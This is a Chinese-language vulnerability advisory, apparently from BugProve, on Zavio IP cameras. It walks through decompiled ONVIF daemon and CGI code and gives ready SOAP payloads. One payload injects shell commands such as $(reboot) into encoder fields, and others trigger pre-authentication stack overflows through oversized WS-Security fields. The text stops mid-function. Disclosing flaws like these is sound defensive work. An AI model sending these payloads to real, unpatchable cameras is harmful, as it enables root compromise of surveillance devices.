关于 Zavio IP 摄像头
Zavio是一家中国制造商,供应用于民用和工业目的的视频监控设备。根据您提供的信息,Zavio似乎在2022年积极在其网站上提供产品组合的信息,但在撰写本报告时,他们似乎已经停止运营。该供应商在某些摄像机类别中拥有全球市场份额,并通过不同的分销商在美国和欧盟拥有大量安装基础。如果您使用了Zavio的产品,特别是受影响的固件版本,可能需要采取适当的安全措施以保护您的设备和网络安全。此外,建议与相关的分销商或安全机构保持联系,以获取有关产品更新和漏洞修复的最新信息。
受影响的产品
受影响的固件版本是 M2.1.6.05。
| Vendor | Models |
|---|---|
| Zavio | CF7500 |
| Zavio | CF7300 |
| Zavio | CF7201 |
| Zavio | CF7501 |
| Zavio | CB3211 |
| Zavio | CB3212 |
| Zavio | CB5220 |
| Zavio | CB6231 |
| Zavio | B8520 |
| Zavio | B8220 |
| Zavio | CD321 |
产品网址
以下是与受影响的产品相关的网址:
- 一个主要分销商:https://www.cctvcamerapros.com/Zavio-IP-Cameras-s/404.htm
- Zavio的官方网站(目前不再运营,存档链接):https://web.archive.org/web/20230608003748/https://www.zavio.com/
摘要
BugProve发现了影响多个Zavio产品的大量(34+)不同的内存损坏和命令注入漏洞。由于截至目前为止,Zavio似乎已经停止运营,不太可能会提供安全更新。我们强烈建议使用这些设备的用户考虑更换到不受漏洞影响的其他型号,以确保他们的设备和网络的安全性。
详细信息
Zavio IP 摄像头提供ONVIF接口,以支持与各种监控系统的集成。这是通过固件中的可执行文件/usr/sbin/Onvif实现的服务来支持的。这个守护进程通过监听网络连接的主要Web服务器接收HTTP请求,但认证并不是在这个层面进行的,认证是根据Onvif服务规范执行的,使用WS-Security。有关更多信息,请参考ONVIF核心规范5.12.1。
然而,该可执行文件在解析封装SOAP消息的XML消息时包含了大量的内存损坏问题。此外,对于某些系统配置任务,Onvif会将请求转发回到正常的Web服务CGI,如param.cgi,它们实现在/usr/share/www/cgi-bin/[userrole]/param下。这些执行流程会受到各种参数的附加命令注入的影响,如下所示。
BUGPROVE-2023-14-001 后授权命令注入,涉及多个Zavio IP 摄像头
这些摄像机型号使用了由供应商进行定制修改的Boa Web服务器。它们的管理界面是通过普通的CGI可执行文件按照规范来完成的,而ONVIF接口和相关服务由/usr/sbin/Onvif守护进程实现。Boa Web服务器被配置为通过Unix域套接字传输请求:
Transfer /video /tmp/unicast
Transfer /stream /tmp/unicast
Transfer /video.mjpg /tmp/unicast
Transfer /onvif /tmp/onvif.sck
Transfer /onvif/device_service /tmp/onvif.sck
Transfer /onvif/media_service /tmp/onvif.sck
Transfer /onvif/event_service /tmp/onvif.sck
Transfer /onvif/Media /tmp/onvif.sck
Transfer /onvif/Events /tmp/onvif.sck
Transfer /onvif/Imaging /tmp/onvif.sck
Transfer /onvif/DeviceIO /tmp/onvif.sck
Transfer /onvif/PTZ /tmp/onvif.sck
Transfer /onvif/Recording /tmp/onvif.sck
Transfer /audio_in /tmp/audio
这个可执行文件会根据以下方式处理传入的请求在其主循环中:
undefined4 main(int param_1,char **param_2)
{
int iVar1;
size_t sVar2;
tm *ptVar3;
int iVar4;
[..] // declaration and initialization of locals
memset(&DAT_0004a170,0,(size_t)&DAT_0000fbb8);
strcpy(&DAT_0004b2c0,"eth0");
bVar7 = false;
LAB_0000bbc4:
while (iVar1 = getopt(param_1,param_2,"d:i:h"), iVar1 != -1) {
if (iVar1 != 0x68) {
if (iVar1 != 0x69) goto code_r0x0000bb9c;
goto LAB_0000bbb0;
}
FUN_0000ace4();
}
if (!bVar7) {
daemon(0,1);
}
FUN_0001bd5c();
signal(0xf,(__sighandler_t)&LAB_0000ba08);
signal(10,(__sighandler_t)&LAB_0000ba08);
signal(0xc,(__sighandler_t)&LAB_0000ba08);
signal(0xe,(__sighandler_t)&LAB_0000ba08);
DAT_0004a706 = FUN_00009f30();
FUN_0000b9a8();
while (iVar1 = open_onvif_socket(&DAT_0004a170,0), iVar1 < 0) { // handling /tmp/onvif.sck
sleep(4);
}
printf("\x1b[0;32;32m UUID: %s \x1b[0m",&DAT_0004a170);
printf("Open ONVIF Success\n\x1b[0m");
FUN_0000bac4();
LAB_0000bc88:
local_8c40 = 0;
do {
if (DAT_0004a160 != 0) {
FUN_0000af4c(&DAT_0004a170);
return 0;
}
[..] // bulk of request handling branches
} while( true );
code_r0x0000bb9c:
if (iVar1 == 100) {
FUN_0001b690(1);
bVar7 = true;
LAB_0000bbb0:
strcpy(&DAT_0004b2c0,optarg);
}
goto LAB_0000bbc4;
code_r0x0000c2f8:
FUN_00018ed4(&DAT_0004a170);
goto LAB_0000bc88;
}
由于存在命令注入,以下经过身份验证的 ONVIF 请求 device_service (SetVideoEncoderConfiguration) 将重新启动摄像机:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">yhOs0+FzKdWTbDUCv740tVTqOcY=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l7cEAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T06:53:11.183Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetVideoEncoderConfiguration xmlns="http://www.onvif.org/ver10/media/wsdl">
<Configuration token="VideoEncoderConfiguration0">
<Name xmlns="http://www.onvif.org/ver10/schema">$(reboot)</Name>
<UseCount xmlns="http://www.onvif.org/ver10/schema">1</UseCount>
<Encoding xmlns="http://www.onvif.org/ver10/schema">$(reboot)</Encoding>
<Resolution xmlns="http://www.onvif.org/ver10/schema">
<Width>$(reboot)</Width>
<Height>$(reboot)</Height>
</Resolution>
<Quality xmlns="http://www.onvif.org/ver10/schema">$(reboot)</Quality>
<RateControl xmlns="http://www.onvif.org/ver10/schema">
<FrameRateLimit>$(busybox)</FrameRateLimit>
<EncodingInterval>1</EncodingInterval>
<BitrateLimit>$(busybox)</BitrateLimit>
</RateControl>
<H264 xmlns="http://www.onvif.org/ver10/schema">
<GovLength>$(busybox)</GovLength>
<H264Profile>Baseline</H264Profile>
</H264>
<Multicast xmlns="http://www.onvif.org/ver10/schema">
<Address>
<Type>IPv4</Type>
<IPv4Address>0</IPv4Address>
</Address>
<Port>0</Port>
<TTL>15</TTL>
<AutoStart>false</AutoStart>
</Multicast>
<SessionTimeout xmlns="http://www.onvif.org/ver10/schema">PT1M</SessionTimeout>
</Configuration>
<ForcePersistence>true</ForcePersistence>
</SetVideoEncoderConfiguration>
</s:Body>
</s:Envelope>
载荷将触发以下执行流程:
- Onvif在0x11c1c处处理请求。
- 在0x23390处查找字段将存储由攻击者控制的数据。
- 最终,将转发HTTP请求到0x23d68的param.cgi。
- param.cgi将在入口处反序列化消息,并在0xe9a0处启动更新操作。
- 更新操作将调用0xcfe4,并将执行0xd4fc,其中会调用0xac74,并将攻击者控制的数据复制到0xaf68处的全局结构(该全局结构本身具有地址0x22758)。
- 执行过程中稍后会遇到一个分支,该分支尝试使用/usr/sbin/check_param验证用户参数。
- 最终,这将调用0xba18,将用户控制的数据传递给popen()。
1) 请求处理
通过主循环,Onvif将请求分发给处理与媒体相关的端点的代码,包括SetVideoEncoderConfiguration:
int FUN_00011b64(char *param_1,undefined4 param_2,char *param_3,int param_4)
{
int iVar1;
undefined4 uVar2;
uint uVar3;
char *pcVar4;
char *pcVar5;
undefined auStack280 [128];
undefined auStack152 [128];
memset(auStack152,0,0x80);
FUN_0001cb44(1,"media command is %s\n",param_3);
FUN_0001dbbc(param_2,"ProfileToken",auStack152);
iVar1 = strcmp(param_3,"GetProfiles");
if (iVar1 == 0) {
iVar1 = FUN_00011720(param_1,param_4);
return iVar1;
}
iVar1 = strcmp(param_3,"GetProfile");
if (iVar1 == 0) {
iVar1 = FUN_000113ec(param_1,auStack152,param_4);
return iVar1;
}
iVar1 = strcmp(param_3,"SetVideoEncoderConfiguration");
if (iVar1 == 0) {
iVar1 = FUN_00023074(param_1,param_2,param_4); // 00011c1c bl FUN_00023074
2) 在字段中存储由攻击者控制的数据
这将处理如下的输入数据:
iVar1 = cfg_init("/etc/device.conf");
if (iVar1 == 0) {
printf("unable to open %s\n","/etc/device.conf");
return 0;
}
iVar2 = cfg_find_param_node(iVar1,"root");
if (iVar2 == 0) {
puts("#Error: unable to find root");
cfg_deinit(iVar1);
return 0;
}
local_3f8c = FUN_00021694();
cfg_deinit(iVar1);
memset(&local_f84,0,0x1cc);
FUN_0001dbbc(param_2,"Name",acStack2360);
FUN_0001dbbc(param_2,"Encoding",acStack2488);
FUN_0001dbbc(param_2,"Width",local_a38);
/*
0002338c 37 2c 8d e2 add r2,sp,#0x3700
00023390 18 20 82 e2 add r2,r2,#0x18
00023394 cc 1a 9f e5 ldr r1=>s_Width_0003b39b,[PTR_s_Width_00023e68] = 0003b39b
= "Width"
00023398 06 00 a0 e1 cpy r0,r6
0002339c 06 ea ff eb bl FUN_0001dbbc undefined FUN_0001dbbc()
*/
FUN_0001dbbc(param_2,"Height",local_ab8);
FUN_0001dbbc(param_2,"Quality",local_b38);
FUN_0001dbbc(param_2,"FrameRateLimit",local_bb8);
FUN_0001dbbc(param_2,"BitrateLimit",auStack3128);
FUN_0001dbbc(param_2,"GovLength",&local_38);
FUN_0001cb64(param_2,auStack4484,"Multicast");
3) 发送HTTP请求到param.cgi
对param CGI可执行文件的请求是按照以下方式封装的:
local_4150 = acStack696;
local_414c = acStack824;
local_4148 = acStack1080;
local_4144 = acStack1336;
local_4140 = acStack1592;
local_413c = acStack1848;
local_4138 = acStack2104;
sprintf(acStack6020,"/cgi-bin/admin/param?action=update%s%s%s%s%s%s%s%s%s",acStack184,acStack440);
printf("cgiparam = %s\n",acStack6020);
memset(auStack16260,0,0x2800);
FUN_0001d1c0(acStack6020,*(undefined2 *)(param_3 + 0x122e),auStack16260,0x2800);
printf("response = %s\n",auStack16260);
并通过以下方式在环路接口上发送:
void FUN_0001d1c0(undefined4 param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4)
{
undefined auStack104 [80];
memset(auStack104,0,0x50);
FUN_0000a720(auStack104);
send_http_request("127.0.0.1",param_2,param_1,param_3,param_4,auStack104,1);
return;
}
这将再次到达Boa Web服务器,Boa会按照标准的CGI IPC将参数传递给param可执行文件。
4) param CGI 处理新请求
这个过程将在入口处反序列化消息,并在0xe9a0处启动一个更新操作。
void main(int param_1,int param_2,undefined4 param_3,undefined4 param_4)
{
int iVar1;
int iVar2;
int iVar3;
if (param_1 == 2) {
iVar3 = FUN_0001579c(*(undefined4 *)(param_2 + 4));
iVar1 = 0;
iVar2 = 0;
}
else {
iVar1 = FUN_00015a64();
if (iVar1 == 1) {
iVar3 = deserialize();
iVar2 = process_post();
}
else {
if (iVar1 == 0) {
iVar3 = deserialize();
iVar2 = iVar1;
}
else {
iVar3 = 0;
iVar2 = iVar3;
}
}
}
DAT_00032878 = 0;
process_action(iVar3,iVar2,iVar1,&DAT_00032874,param_4);
FUN_00016214(iVar1,iVar3,iVar2);
而process_action根据 URI 中的操作类型调用函数:
else {
firstparam = strncmp(get_array_alias,"update",6);
if ((firstparam == 0) && (firstparam = index_into(get_array_alias,1), firstparam != 0)) {
update_stuff(param_idx_to_handle);
/* 0000e9a0 f2 fb ff eb bl update_stuff undefined update_stuff(undefined */
}
else {
firstparam = strncmp(get_array_alias,"list",4);
if ((firstparam != 0) || (firstparam = index_into(get_array_alias,1), firstparam == 0))
goto LAB_0000e8ec;
FUN_00009a78(param_idx_to_handle);
}
}
}
5)攻击者控制的数据保存在 param
更新操作将调用0xcfe4,然后会执行0xd4fc,随后调用0xac74,这将把攻击者控制的数据复制到0xaf68处的一个全局结构中(该全局结构本身的地址是0x22758)。
else {
iVar4 = strncmp(structoffset,"General",7);
if (iVar4 == 0) {
local_280 = (char *)general_handler(structoffset,updated_value[index + 1]);
}
else {
iVar4 = strncmp(structoffset,"StreamProfile",0xd);
if (iVar4 == 0) {
/* 0000d4fc 5e 00 00 0a beq LAB_0000d67c*/
copy_stuff_to_globals_for_streamprofile
(structoffset,updated_value[index + 1],&global_struct,
maxcount_maybe);
uVar2 = cfg_find_param_node(cfg_root,"Properties.VideoOut.VideoOut");
iVar4 = cfg_get_param_value(uVar2,&local_26c,0x80);
if ((iVar4 != 0) ||
((((local_26c == 'y' && (local_26b == 'e')) && (local_26a == 's')) &&
(local_269 == '\0')))) {
structoffset = updated_value[index + 1];
iVar4 = strcmp("640x480",structoffset);
if (((iVar4 == 0) ||
(iVar4 = strcmp("640x360",structoffset), iVar4 == 0)) &&
((global_struct_3 == 'o' &&
((DAT_00023755 == 'n' && (DAT_00023756 == '\0')))))) {
uVar2 = cfg_find_param_node(cfg_root,
"ImageSource.I0.Config.MaxResolution");
cfg_get_param_value(uVar2,&local_26c,0x80);
iVar4 = strcmp(&local_26c,"640x480");
if ((iVar4 != 0) && (iVar4 = strcmp(&local_26c,"640x360"), iVar4 != 0)
) goto LAB_0000d778;
uint copy_stuff_to_globals_for_streamprofile(char *streamprofile,char *update_value,int param_3)
{
/* **************************************************************
* FUNCTION *
**************************************************************
undefined __stdcall copy_stuff_to_globals_for_streamprof
0000ac74 f0 4f 2d e9 stmdb sp!,{r4 r5 r6 r7 r8 r9 r10 r11 lr}
*/
do {
pcVar1 = strstr(streamprofile,(char *)__needle);
if (pcVar1 != (char *)0x0) {
my_index = FUN_000154dc(streamprofile);
if (((uint)(param_3 <= (int)my_index) | my_index >> 0x1f) == 0) {
switch(iVar2) {
case 0:
strcpy(&global_struct + my_index * 0x11c,update_value);
/*
global_struct XREF[10]: copy_stuff_to_globals_for_stream
0000b07c(*),
paramparse:0000d230(*),
paramparse:0000d5ec(R),
paramparse:0000d654(*),
paramparse:0000d680(*),
paramparse:0000d7e0(*),
paramparse:0000d804(*),
0000d8dc(*), 000156fc(*)
00022758 00 undefined1 00h
00022759 00 ?? 00h
*/
return my_index;
case 1:
[..]
} while (iVar2 != 0xdc);
return 0;
}
6) 检查参数
在0xcfe4函数中,控制流进入下面的分支,其中调用了check_param实用程序进行额外的输入验证。存储在global_struct中的数据用于组装shell命令。
}
if (0 < maxcount_maybe) {
structoffset = &global_struct;
index = 0;
do {
if ((*structoffset != '\0') && (structoffset[0x14] != '\0')) {
index_multiplied = index * 0x11c;
max = strtol(&DAT_00022860 + index_multiplied,(char **)0x0,10);
puVar7 = &global_struct_3;
snprintf(check_prm_command_str,0x80,"/usr/sbin/check_param %s %s %d %s",
&global_struct + index_multiplied,&global_struct_2 + max * 0x14,index,
&global_struct_3);
iVar4 = command_inj(check_prm_command_str);
if (iVar4 == -1) goto LAB_0000d778;
snprintf(check_prm_command_str,0x80,"/usr/sbin/check_param %s %s %d",
&global_struct + index_multiplied,&global_struct_4 + index_multiplied,
index,puVar7);
iVar4 = command_inj(check_prm_command_str);
if (iVar4 == -1) goto LAB_0000d778;
}
index = index + 1;
structoffset = structoffset + 0x11c;
} while (index < maxcount_maybe);
}
if (local_27c != (char *)0x1) {
7 ) 命令注入
然而,在执行命令本身时,将调用以下函数,导致命令注入:
undefined4 command_inj(char *param_1)
/*
**************************************************************
* FUNCTION *
**************************************************************
undefined command_inj()
undefined r0:1 <RETURN>
command_inj XREF[5]: FUN_0000bac4:0000bbb4(c),
FUN_0000bc98:0000be38(c),
FUN_0000c170:0000ca94(c),
paramparse:0000d7f4(c),
paramparse:0000d828(c)
0000ba18 70 40 2d e9 stmdb sp!,{r4 r5 r6 lr}
0000ba1c 80 d0 4d e2 sub sp,sp,#0x80
0000ba20 00 60 a0 e1 cpy r6,r0
*/
{
FILE *__stream;
char *pcVar1;
char acStack144 [128];
memset(acStack144,0,0x80);
__stream = popen(param_1,"r");
if (__stream == (FILE *)0x0) {
printf("ptr Fail %s \n",param_1);
}
else {
do {
pcVar1 = fgets(acStack144,0x80,__stream);
if (pcVar1 == (char *)0x0) {
pclose(__stream);
return 0;
}
pcVar1 = strstr(acStack144,"Error");
} while (pcVar1 == (char *)0x0);
puts(acStack144);
pclose(__stream);
}
return 0xffffffff;
}
BUGPROVE-2023-14-002 预授权缓冲区溢出,涉及WS-Security用户名处理。
Onvif服务使用WS-Security规范来验证发出请求的用户的真实性。然而,由于对封装WSS SOAP消息的XML数据处理不安全,身份验证流程包含缓冲区溢出。特别是,当发送以下负载到device_service(device/wsdl/GetScopes)时,实现会受到缓冲区溢出的影响。
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.....</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">/zyOVCz6/DuXXPwXVTZbfKt5o50=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">krtT6FlK40yDVAmnldYI+wMAAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-01-04T10:21:41.000Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl" />
</s:Body>
</s:Envelope>
请注意,随意选择随机数(Nonce)或密码不会影响利用,这里提供的值是在我们的测试中使用的值。
使用以下函数对用户进行身份验证:
undefined4 auth_user(undefined4 xml_doc,undefined4 hugelocalbuf,astruct_2 *context)
{
size_t token_length;
char *ptr;
int iVar1;
int iVar2;
undefined4 uVar3;
char *pcVar4;
int username_index;
char unametoken [2048];
char created_holder [64];
char nonce_holder [64];
char password_holder [64];
char username_holder [68];
memset(unametoken,0,0x800);
memset(username_holder,0,0x40);
memset(password_holder,0,0x40);
memset(nonce_holder,0,0x40);
memset(created_holder,0,0x40);
get_xml_element(xml_doc,unametoken,"UsernameToken");
token_length = strlen(unametoken);
if (5 < token_length) {
ptr = strchr(unametoken,0x3e);
lookup_field_xml(ptr,"Username",username_holder);
lookup_field_xml(ptr,"Nonce",nonce_holder);
lookup_field_xml(ptr,"Password",password_holder);
lookup_field_xml(ptr,"Created",created_holder);
提供的凭据会被哈希处理,并与数据库中的数据进行匹配:
memset(to_be_hashed,0,0x80);
memset(the_amazing_hash,0,0x80);
memset(final_digest,0,0x80);
memset(out,0,0x80);
memset(acStack812,0,0x100);
len0[0] = 0x20;
len2 = strlen(nonce);
use_nonce(nonce,len2,len0,out);
memcpy(to_be_hashed,out,len0[0]);
len2 = len0[0];
noncelen = sprintf((char *)(to_be_hashed + len0[0]),"%s",created);
len3 = sprintf((char *)(to_be_hashed + noncelen + len2),password_in_db);
SHA1(to_be_hashed,noncelen + len2 + len3,the_amazing_hash);
base64_mb(the_amazing_hash,final_digest,0x14);
sprintf(acStack812,"nonce:%s date:%s pass:%s pasDt:%s digest:%s\n",nonce,created,password_in_db,
password_specified,final_digest);
noncelen = strcmp(password_specified,final_digest);
if (noncelen != 0) {
FUN_0001bb5c("digest_fail",acStack812);
}
return noncelen == 0;
}
但是,问题在于用于从请求中提取 XML 元素的函数容易出现微不足道的缓冲区溢出:
undefined4 lookup_field_xml(undefined4 src,undefined4 fieldname,char *out)
{
char *__src;
__src = (char *)key_value_given_by_user_fine(src,fieldname,0);
if (__src != (char *)0x0) {
strcpy(out,__src);
free(__src);
return 1;
}
return 0;
}
这个函数完全忽略了out缓冲区的大小,通常*out缓冲区是调用者的栈框架上的固定大小的缓冲区。这导致了线性溢出。由于二进制文件缺乏二进制强化措施,我们能够利用这些问题以root用户的上下文在设备上运行任意代码。可以假定未经身份验证的远程攻击者能够进行类似的攻击。
BUGPROVE-2023-14-003 Pre-Auth Buffer Overflow with WS-Security Password processing
类似于BUGPROVE-2023-14-002,Password元素也容易受到漏洞的影响。
发送以下有效负载将触发崩溃:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>dummy</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">AAAAAAAAAAAAAAAA....................</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">krtT6FlK40yDVAmnldYI+wMAAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-01-04T10:21:41.000Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl" />
</s:Body>
</s:Envelope>
这允许远程未经身份验证的攻击者危害Onvif服务并在以root用户身份的设备上运行任意代码。
BUGPROVE-2023-14-004 使用 WS 安全随机数处理的预身份验证缓冲区溢出
与 BUGPROVE-2023-14-003 类似,Nonce元素也容易出现漏洞。
发送以下有效负载将触发崩溃:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>dummy</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">dummy</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">AAAAAAAAAAAAAA..............</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">dummy</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl" />
</s:Body>
</s:Envelope>
这使得未经身份验证的远程攻击者能够破坏 Onvif 服务,并在根用户的上下文中在设备上运行任意代码。
BUGPROVE-2023-14-005 使用 WS 安全性创建的预身份验证缓冲区溢出处理
与 BUGPROVE-2023-14-003 类似,Nonce元素也容易出现漏洞。
发送以下有效负载将触发崩溃:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>dummy</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">dummy</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">dummy</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">AAAAAAAAAAAAAAAAA.............</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl" />
</s:Body>
</s:Envelope>
这允许远程未经身份验证的攻击者危害Onvif服务并在以root用户身份的设备上运行任意代码。
BUGPROVE-2023-14-006 使用 XML 元素处理的预身份验证缓冲区溢出
XML 分析器具有其他内存损坏,未经身份验证的用户可以使用损坏的 XML 文档访问这些损坏。例如,以下函数用于提取 XML 元素:
void parse_xml_insecure(char *input,char *param_2,char *endpoint)
{
char *body_pointer;
char *pcVar1;
char *pcVar2;
char *pcVar3;
char *pcVar4;
size_t sVar5;
int __c;
size_t sVar6;
char cStack664;
char acStack663 [255];
char acStack408 [256];
char acStack152 [64];
char acStack88 [32];
char acStack56 [8];
undefined4 local_30;
undefined4 local_2c;
memset(acStack408,0,0x100);
memset(&cStack664,0,0x100);
memcpy(acStack56,PTR_s_http://_0000b58c,8);
local_30 = 0;
local_2c = 0;
memset(acStack88,0,0x20);
memset(acStack152,0,0x40);
body_pointer = strstr(input,PTR_DAT_0000b590);
if (body_pointer == (char *)0x0) {
return;
}
body_pointer = strchr(body_pointer,0x3c);
pcVar1 = strchr(body_pointer,0x3e);
sVar6 = (int)pcVar1 - (int)body_pointer;
strncpy(&cStack664,body_pointer,sVar6);
从上面可以看出,逻辑没有考虑非常大的元素。因此,类似于下面的有效负载将使进程崩溃:
<s:Body xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><AAAAAAAAAAAAAAAAAAAAAAAAA......................
></s:Envelope>
这覆盖了一个固定大小的栈缓冲区。这反过来使得远程未经身份验证的攻击者能够危害Onvif服务并在以root用户上下文的设备上运行任意代码。
BUGPROVE-2023-14-007 已创建(有效用户名)处理的预身份验证缓冲区溢出
BUGPROVE-2023-14-005的一个变种是攻击者正确猜测用户名的情况(实际上,由于摄像头中配置错误的ONVIF访问控制,她可以轻松地执行此操作,只需通过HTTP请求获取所有用户的名称。)。
在这种情况下,检查凭据时将触发以下代码:
bool check_users_password
(char *nonce,undefined4 created,char *password_in_db,char *password_specified)
{
int noncelen;
int len3;
char acStack812 [256];
undefined out [128];
char final_digest [128];
uchar the_amazing_hash [128];
uchar to_be_hashed [128];
size_t len0 [2];
size_t len2;
memset(to_be_hashed,0,0x80);
memset(the_amazing_hash,0,0x80);
memset(final_digest,0,0x80);
memset(out,0,0x80);
memset(acStack812,0,0x100);
len0[0] = 0x20;
len2 = strlen(nonce);
use_nonce(nonce,len2,len0,out);
memcpy(to_be_hashed,out,len0[0]);
len2 = len0[0];
noncelen = sprintf((char *)(to_be_hashed + len0[0]),"%s",created);
len3 = sprintf((char *)(to_be_hashed + noncelen + len2),password_in_db);
在这种情况下,攻击者控制的 Created 字符串现在将复制到另一个本地缓冲区中,现在在此堆栈帧中。以下有效负载将演示该问题:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">dummy</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">dummy</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">AAAAAAAA..........</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<GetScopes xmlns="http://www.onvif.org/ver10/device/wsdl" />
</s:Body>
</s:Envelope>
这使得未经身份验证的远程攻击者能够破坏 Onvif 服务,并在根用户的上下文中在设备上运行任意代码。
BUGPROVE-2023-14-008 使用 xmlns 处理的预身份验证缓冲区溢出
XML 分析具有经过身份验证的用户可以访问的其他内存损坏问题。也就是说,处理 xmlns 标记涉及另一个缓冲区溢出。
void parse_xml_insecure(char *input,char *param_2,char *endpoint)
{
char *body_pointer;
char *pcVar1;
char *pcVar2;
char *pcVar3;
char *pcVar4;
size_t sVar5;
int __c;
size_t sVar6;
char cStack664;
char acStack663 [255];
char acStack408 [256];
char acStack152 [64];
char acStack88 [32];
char acStack56 [8];
undefined4 local_30;
undefined4 local_2c;
memset(acStack408,0,0x100);
memset(&cStack664,0,0x100);
memcpy(acStack56,PTR_s_http://_0000b58c,8);
local_30 = 0;
local_2c = 0;
memset(acStack88,0,0x20);
memset(acStack152,0,0x40);
body_pointer = strstr(input,PTR_DAT_0000b590);
if (body_pointer == (char *)0x0) {
return;
}
body_pointer = strchr(body_pointer,0x3c);
pcVar1 = strchr(body_pointer,0x3e);
sVar6 = (int)pcVar1 - (int)body_pointer;
strncpy(&cStack664,body_pointer,sVar6);
pcVar1 = strstr(&cStack664,PTR_s_http://_0000b58c);
if (pcVar1 == (char *)0x0) {
pcVar1 = strchr(&cStack664,0x3a);
if (pcVar1 == (char *)0x0) {
strncpy(endpoint,acStack663,sVar6);
strcpy(param_2,PTR_s_http://www.onvif.org/ver20/ptz/w_0000b594);
return;
}
strncpy(acStack88,acStack663,(int)pcVar1 - (int)acStack663);
sprintf(acStack152,"xmlns:%s=\"",acStack88);
sVar5 = strlen(acStack152);
pcVar1 = strstr(input,acStack152);
pcVar1 = pcVar1 + (sVar5 & 0xff);
pcVar2 = strchr(pcVar1,0x22);
pcVar3 = strchr(&cStack664,0x3a);
pcVar3 = pcVar3 + 1;
pcVar4 = strchr(pcVar3,0x2f);
if ((pcVar4 != (char *)0x0) || (pcVar4 = strchr(pcVar3,0x3e), pcVar4 != (char *)0x0))
